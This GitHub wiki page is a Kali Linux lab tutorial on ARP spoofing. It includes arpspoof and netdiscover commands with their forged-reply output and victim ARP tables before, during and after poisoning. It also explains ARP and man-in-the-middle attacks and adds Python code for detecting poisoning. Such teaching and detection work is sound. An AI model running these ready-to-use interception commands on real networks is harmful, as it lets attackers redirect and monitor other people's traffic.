Arp spoofing - altanmelihh/Kali GitHub Wiki

```
C:\Users\melih>arp -a

Interface: 192.168.1.12 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           30-cc-21-39-0d-ec     dynamic
  192.168.1.2           ec-be-5f-fe-2e-9b     dynamic
  192.168.1.5           14-85-7f-74-7f-39     dynamic
  192.168.1.51          2e-55-ac-57-79-65     dynamic
  192.168.1.67          2e-55-ac-57-79-65     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
```

Device 1:

```
┌──(root㉿Maxwell)-[/home/maxwell]
└─# arpspoof -i eth0 -t 192.168.1.12 192.168.1.1
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
^C2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65
^CCleaning up and re-arping targets...
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec
2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec

┌──(root㉿Maxwell)-[/home/maxwell]
└─#
```

Device 2:

```
┌──(root㉿Maxwell)-[/home/maxwell]
└─# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65
^CCleaning up and re-arping targets...
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef
2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef
```

During the attack, the gateway entry (192.168.1.1) shows 2e-55-ac-57-79-65:

```
C:\Users\melih>arp -a

Interface: 192.168.1.12 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           2e-55-ac-57-79-65     dynamic
  192.168.1.2           ec-be-5f-fe-2e-9b     dynamic
  192.168.1.5           14-85-7f-74-7f-39     dynamic
  192.168.1.14          2e-55-ac-57-79-65     dynamic
  192.168.1.51          2e-55-ac-57-79-65     dynamic
  192.168.1.67          2e-55-ac-57-79-65     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
```

After the attack ends:

```
C:\Users\melih>arp -a

Interface: 192.168.1.12 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           30-cc-21-39-0d-ec     dynamic
  192.168.1.2           ec-be-5f-fe-2e-9b     dynamic
  192.168.1.5           14-85-7f-74-7f-39     dynamic
  192.168.1.14          2e-55-ac-57-79-65     dynamic
  192.168.1.51          2e-55-ac-57-79-65     dynamic
  192.168.1.67          2e-55-ac-57-79-65     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
```

ARP (Address Resolution Protocol): It is used on a local network to find the MAC address of a device whose IP address is known. Computers on the network communicate with each other using MAC addresses. When a source device wants to send a packet to a computer whose IP it knows, it looks in its ARP table and checks whether the destination device's MAC address is there. If the ARP table does not contain the destination's MAC address, ARP comes into play and sends an ARP Request packet to the local network to learn the MAC address of the device whose IP it knows. The ARP Request contains the IP address of the device whose MAC address is wanted. Every device on the network receives the ARP Request; devices that see the IP is not theirs discard the packet. The device that recognizes the IP address as its own accepts the Request and sends its MAC address back to the source device in an ARP Reply packet.

ARP Poisoning: The attacker continuously sends forged ARP Reply packets to the local network as broadcast. As soon as a device that wants to reach its destination issues an ARP Request, it receives the attacker's ARP Reply as the answer. The attacker presents itself as the gateway, and victims going out to the internet do so through the attacker's device. This gives the attacker the chance to monitor all of the victim's traffic and to access its data. For this reason, ARP spoofing is classed among MITM (Man in the Middle) attacks.
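The request/reply exchange and the forged reply described above can be checked passively on the wire. The following Python monitor is an added example, not code from the original page; `ArpWatch`, `build_arp`, `parse_arp_frame` and the alert names are hypothetical, and the frames are constructed from the addresses in the arpspoof output (where `0806` is the ARP EtherType and `42` the frame length in bytes).

```python
import struct

def _mac(s):
    return bytes(int(p, 16) for p in s.split(":"))
def _ip(s):
    return bytes(int(p) for p in s.split("."))

def build_arp(op, eth_dst, sha, spa, tha, tpa):
    """Constructed test input: one 42-byte Ethernet + ARP frame."""
    eth = _mac(eth_dst) + _mac(sha) + b"\x08\x06"
    hdr = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    return eth + hdr + _mac(sha) + _ip(spa) + _mac(tha) + _ip(tpa)

def parse_arp_frame(frame):
    """Return (op, sender_mac, sender_ip, target_ip), or None if not IPv4 ARP."""
    if (len(frame) < 42 or frame[12:14] != b"\x08\x06"
            or struct.unpack("!HHBB", frame[14:20]) != (1, 0x0800, 6, 4)):
        return None
    op, = struct.unpack("!H", frame[20:22])
    sha = ":".join(f"{b:02x}" for b in frame[22:28])
    spa = ".".join(map(str, frame[28:32]))
    tpa = ".".join(map(str, frame[38:42]))
    return op, sha, spa, tpa

class ArpWatch:
    """Passive monitor: remembers the first MAC seen per IP and open requests."""
    def __init__(self):
        self.bindings, self.pending = {}, set()
    def feed(self, frame):
        parsed = parse_arp_frame(frame)
        if parsed is None:
            return []
        op, sha, spa, tpa = parsed
        alerts = []
        if op == 1:                      # request: someone asks "who has tpa?"
            self.pending.add(tpa)
        elif op == 2:                    # reply: spa claims to be at sha
            if spa not in self.pending:  # nobody asked for this IP
                alerts.append(("unsolicited-reply", spa, sha))
            self.pending.discard(spa)
        known = self.bindings.setdefault(spa, sha)
        if known != sha:                 # same IP, different MAC than first seen
            alerts.append(("binding-conflict", spa, known, sha))
        return alerts

V, G, A = "f2:28:e7:1a:66:ef", "30:cc:21:39:0d:ec", "2e:55:ac:57:79:65"  # MACs from the page
FRAMES = [build_arp(1, "ff:ff:ff:ff:ff:ff", V, "192.168.1.12", "00:00:00:00:00:00", "192.168.1.1"),
          build_arp(2, V, G, "192.168.1.1", V, "192.168.1.12"),   # real gateway answers
          build_arp(2, V, A, "192.168.1.1", V, "192.168.1.12")]   # forged reply
```

Unsolicited replies also occur legitimately (gratuitous ARP after an address change), so treat that alert as low confidence; a binding conflict on the gateway's IP is the stronger signal.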

Now let's exploit this weakness ourselves!

I will carry out the attack from Kali Linux against a Windows machine that I set up as a virtual machine. I will explain it step by step and share the screenshots with you:

Step 1: First, let's find out our gateway.

Step 2: Let's find the victim device's IP address with the `netdiscover -r 192.168.1.0/24` command.

```
netdiscover -r 192.168.1.0/24
```


Step 3: On the victim device, let's display the ARP table and look at the gateway's MAC address.


Step 4: Let's also find out the MAC address of our attacker device.


Step 5: Let's send a test ping from the victim device. We can see that the ping reaches google.com without any problem.


Step 6: Let's carry out the attack using the "Arpspoof" tool. We specify the interface with the -i parameter, the target device's IP address with the -t parameter, and the gateway's IP address with the -r parameter.

```
python arpspoof.py -i eth0 -t 192.168.1.12 -r 192.168.1.1
```


Step 7: After the attack has started, let's display the ARP table on the victim device again. We will see that the gateway's MAC address has been replaced with the attacker device's MAC address.


Step 8: After the attack has started, let's try pinging from the victim device again. We will see that there are problems with the internet connection.
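The before/after comparison of the victim's ARP table in Steps 3 and 7 can be automated on the defender's side. The following Python check is an added example, not code from the original page; the function names are hypothetical, and the two snapshots are a constructed subset of the `arp -a` output shown on this page.

```python
import re

# Constructed subset of the page's `arp -a` snapshots (victim 192.168.1.12).
BEFORE = """Interface: 192.168.1.12 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           30-cc-21-39-0d-ec     dynamic
  192.168.1.51          2e-55-ac-57-79-65     dynamic
  192.168.1.67          2e-55-ac-57-79-65     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static"""
DURING = """Interface: 192.168.1.12 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           2e-55-ac-57-79-65     dynamic
  192.168.1.14          2e-55-ac-57-79-65     dynamic
  192.168.1.51          2e-55-ac-57-79-65     dynamic
  192.168.1.67          2e-55-ac-57-79-65     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static"""

ROW = re.compile(r"^\s*(\d+(?:\.\d+){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)\s*$", re.I)

def parse_arp_table(text):
    """Return {ip: mac} for dynamic rows only; static rows are not learned from replies."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table

def changed_bindings(before, after):
    """IPs present in both snapshots whose MAC differs, as (ip, old_mac, new_mac)."""
    return sorted((ip, before[ip], after[ip])
                  for ip in before.keys() & after.keys()
                  if before[ip] != after[ip])

def shared_macs(table):
    """MACs that answer for more than one IP, as {mac: [ips]}."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {m: sorted(ips) for m, ips in by_mac.items() if len(ips) > 1}

def assess(before_text, during_text, gateway_ip):
    """Compare two snapshots; a rebound gateway entry is the strong indicator."""
    before, during = parse_arp_table(before_text), parse_arp_table(during_text)
    changes = changed_bindings(before, during)
    return {"gateway_rebound": any(ip == gateway_ip for ip, _, _ in changes),
            "changes": changes, "shared": shared_macs(during)}
```

In these snapshots one MAC already answers for two addresses before the attack, so a shared MAC alone is a noisy signal; the changed gateway binding is what distinguishes the attack window. A static neighbor entry for the gateway on the host, or Dynamic ARP Inspection on the switch, prevents the overwrite in the first place.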


https://www.includekarabuk.com/kategoriler/cesitliSizmaTeknikleri/Arp-Spoofing-Saldirisi-Nedir-ve-Nasil-Yapilir.php